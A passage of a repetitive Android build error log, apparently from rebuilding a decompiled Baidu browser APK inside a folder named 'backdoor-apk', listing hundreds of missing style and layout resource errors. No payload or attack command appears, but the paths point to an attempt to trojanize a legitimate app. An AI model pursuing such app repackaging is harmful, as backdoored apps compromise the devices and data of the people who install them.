'@style/news_list_item_title_txt'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f5.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f5.xml:20: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f5.xml:23: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f5.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f5.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f5.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_title_txt'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f5.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f5.xml:20: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f5.xml:23: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:8: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:8: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:4: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_title_txt'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f6.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/news_list_item_common_bottom'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:8: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:8: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:4: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_title_txt'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f6.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/news_list_item_common_bottom'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fh.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fh.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/fh.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/fh.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fp.xml:14: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/content_list_loading_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/fp.xml:14: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/content_list_loading_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fq.xml:7: error: Error: No resource found that matches the given name (at 'style' with value '@style/pull_to_refresh_pb'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/fq.xml:7: error: Error: No resource found that matches the given name (at 'style' with value '@style/pull_to_refresh_pb'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fs.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fs.xml:18: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/fs.xml:16: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/fs.xml:18: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fu.xml:2: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdListView'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fv.xml:2: error: No resource identifier found for attribute 'checkMark' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/fw.xml:2: error: No resource identifier found for attribute 'checkMark' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/meme_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/memeRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/memeRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/memeRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/memeRadioButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g2.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g2.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g2.xml:12: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g2.xml:12: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g2.xml:21: error: Error: No resource found that matches the given name (at 'style' with value '@style/promotion_h_progressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g2.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g2.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g2.xml:12: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g2.xml:12: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g2.xml:21: error: Error: No resource found that matches the given name (at 'style' with value '@style/promotion_h_progressbar'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g3.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g3.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g3.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g3.xml:13: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g3.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g3.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g3.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g3.xml:13: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g4.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g4.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g4.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g4.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g5.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g5.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g5.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g5.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g5.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g5.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/g8.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_vertical'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/g8.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_vertical'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gk.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gk.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gk.xml:18: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gk.xml:22: error: Error: No resource found that matches the given name (at 'style' with value '@style/RateUsDialogButtonStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gl.xml:18: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:17: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gm.xml:18: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:17: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gm.xml:18: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gq.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gq.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gr.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gr.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gr.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gr.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gr.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gr.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gs.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gs.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gs.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gs.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gs.xml:14: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gs.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gs.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gs.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gs.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gs.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gs.xml:14: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gs.xml:15: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:23: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:28: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:33: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:39: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:41: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:43: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gu.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:23: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:28: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:33: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:39: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:41: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:43: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gu.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gv.xml:5: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gv.xml:5: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gv.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gv.xml:5: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gv.xml:5: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gv.xml:12: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitlinehorizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gy.xml:2: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gy.xml:2: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gz.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/gz.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gz.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/gz.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h0.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h0.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h0.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h0.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h0.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h0.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h0.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h0.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h0.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h0.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h5.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h5.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h5.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h5.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/h.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/h_.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdTextShadow'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hb.xml:5: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hb.xml:5: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hb.xml:5: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hb.xml:5: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hd.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hd.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/he.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/he.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hj.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogTextStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hj.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hj.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogTextStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hj.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogBodyStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hq.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationTitle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hq.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hq.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hq.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hq.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationTitle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hq.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: 